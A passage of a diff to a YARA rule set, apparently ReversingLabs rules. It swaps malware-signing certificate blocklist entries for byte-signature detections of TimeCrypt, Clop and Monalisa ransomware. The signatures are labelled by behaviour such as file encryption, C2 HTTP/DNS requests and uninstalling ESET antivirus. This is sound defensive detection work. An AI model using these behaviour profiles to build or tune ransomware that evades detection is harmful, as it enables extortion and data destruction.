8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 + } + $encrypt_internal_message_p1 = { + 55 48 89 E5 53 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? BF ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8B + 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 48 98 48 89 C7 E8 ?? ?? ?? + ?? 48 89 45 ?? 8B 45 ?? 83 C0 ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? + ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? + 8B 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8B 45 ?? 83 E8 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 66 0F EF C0 F2 0F 2A 45 ?? + 66 0F EF C9 F2 0F 2A 4D ?? F2 0F 5E C1 E8 ?? ?? ?? ?? F2 0F 2C C0 89 45 ?? 8B 45 ?? + 0F AF 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 8B 45 ?? 0F AF 45 ?? 48 63 D0 + 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 0F AF 45 ?? 89 C3 48 8B + 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 8B 45 ?? 89 C1 89 DA BF ?? ?? ?? ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 3B 45 ?? 7D ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 45 + ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 89 + } + $encrypt_internal_message_p2 = { + C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 45 ?? 48 8D + 34 02 48 8B 4D ?? 48 8B 55 ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 89 45 + ?? 8B 45 ?? 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48 + 8B 05 ?? ?? ?? ?? 48 8B 55 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? + 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 8B 45 ?? 48 63 D0 8B 45 ?? 48 63 C8 48 8B 45 ?? 48 01 C1 48 8B 45 ?? 48 89 C6 + 48 89 CF E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 8B 45 ?? 01 45 ?? 48 8B 45 ?? 48 89 + C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 0F 8E ?? ?? ?? ?? 48 8B 45 ?? 48 89 + C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 4D ?? 48 8B 45 ?? BA ?? ?? + ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? + 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C4 ?? 5B 5D + C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digisign Server ID - (Enrich)" and pe.signatures[i].serial=="4c:0e:63:6a" and 1320191999<=pe.signatures[i].not_after) + uint32(0)==0x464C457F and ( all of ($main_call_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($encrypt_internal_message_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_072714A9 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timecrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TimeCrypt ransomware." author = "ReversingLabs" - id = "15ad6936-78a4-58b1-8c68-27ec4ed38649" - date = "2023-11-08" - modified = "2023-11-08" + id = "38a0c383-8be6-5258-aa93-0cf09b18e5f7" + date = "2021-12-06" + modified = "2021-12-06" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L981-L997" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8bea4cfb60056446043ef90a7d01ecc52d82d9e7005a145a4daa61a522ecd2ae" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara#L1-L69" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6849d6d5010d7bcb4052c10d5bd7cc29320ffc986f36289b272a1e9a8d14fab9" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TimeCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73 + ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 + 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? + ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? + ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73 + ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A + } + $encrypt_files = { + 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F + ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F + ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A + } + $send_http_request = { + 1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 + 03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? + ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F + ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A + } + $send_dns_request = { + 1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19 + 72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? + 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 26 DE ?? 26 DE ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digisign Server ID (Enrich)" and pe.signatures[i].serial=="07:27:14:a9" and 1320191999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($send_http_request) and ($send_dns_request) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_00D8F35F4Eb7872B2Dab0692E315382Fb0 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Clop : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Clop ransomware." author = "ReversingLabs" - id = "2c051732-76d7-5562-a79e-c5bbdc8373b2" - date = "2023-11-08" - modified = "2023-11-08" + id = "0ea63119-3773-5404-b332-8e3966fd35df" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L999-L1017" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "463757c59c32859163ea80e694e1f39239c857124aad3895f22f83b47645910c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Clop.yara#L1-L109" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0b63db16a4b1cae27a97d0ff9df692a63f1a11120ffac69c05a5c71fbd224007" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Clop" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? + 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? + ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? + ?? 51 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? + ?? 8B 88 ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 8B 82 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B + 91 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 + ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? + ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? + 68 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 + ?? 68 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? + 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? + ?? ?? 52 FF 15 + } + $encrypt_files_p2 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 50 8D + 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 FF + 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8D 95 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 + ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? + 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B + 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D + ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 6A ?? 6A ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? E8 ?? ?? + ?? ?? 50 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B + E5 5D C2 + } + $encrypt_files_p3 = { + 55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B + 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 + ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 + ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8D 4D ?? + 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? + ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 8B 55 ?? 89 11 33 C0 8B E5 5D C3 + } + $find_files = { + 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 + 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? + 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD + ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 76 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? + 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? + ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 + } + $uninstall_eset_av = { + 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? 8D + 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? + ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 8D ?? + ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? + ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "global trustee" and (pe.signatures[i].serial=="00:d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" or pe.signatures[i].serial=="d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0") and 1300060800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($uninstall_eset_av) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_750E40Ff97F047Edf556C7084Eb1Abfd : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Monalisa : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Monalisa ransomware." author = "ReversingLabs" - id = "7ae4ba81-82be-57f9-aa8c-0e5c30e412c6" - date = "2023-11-08" - modified = "2023-11-08" + id = "34addb63-2426-59a2-b79b-052a9161d361" + date = "2022-05-13" + modified = "2022-05-13" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1019-L1035" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "21c2468905514e1725a206814b0c61c576cf7f97f184bac857bca9283f49a957" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Monalisa.yara#L1-L83" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0bcb79dff111ec05ac93bbe9a777546bd6234dc60d9f6982c03cd0bc3b26b038" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Monalisa" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 A1 ?? ?? ?? ?? 33 + C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B CC 89 65 + ?? 8D 45 ?? B3 ?? 51 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 33 C0 6A + ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 E8 ?? ?? ?? ?? + 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8A D3 88 5D ?? 8B CE E8 ?? ?? + ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? + ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? + 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? + ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3 + } + $write_proc_mem = { + 8D 45 ?? 50 FF 76 ?? 8B 46 ?? 03 C7 50 8B 06 03 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 3E 0F B7 41 ?? 48 3B D8 75 ?? 8B 51 ?? + EB ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 56 ?? 8B 4E ?? 2B D7 8B C1 25 ?? + ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? + ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? + ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? + ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 85 C9 + B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 48 C1 8D 4D ?? 51 50 8B 45 ?? 52 03 C7 50 FF 75 ?? + FF 15 + } + $encrypt_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 50 + 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? + ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 51 0F 43 05 ?? ?? ?? ?? 50 6A ?? 68 ?? + ?? ?? ?? 51 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 05 ?? ?? ?? ?? ?? ?? ?? + ?? 0F 10 00 0F 11 05 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 05 ?? ?? ?? ?? C7 40 ?? ?? + ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 89 08 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? + ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 + ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 + 89 0D ?? ?? ?? ?? 59 8B E5 5D C3 + } + $generate_key = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 75 ?? + 8B 0C 88 A1 ?? ?? ?? ?? 3B 81 ?? ?? ?? ?? 7F ?? 56 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? + 75 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? 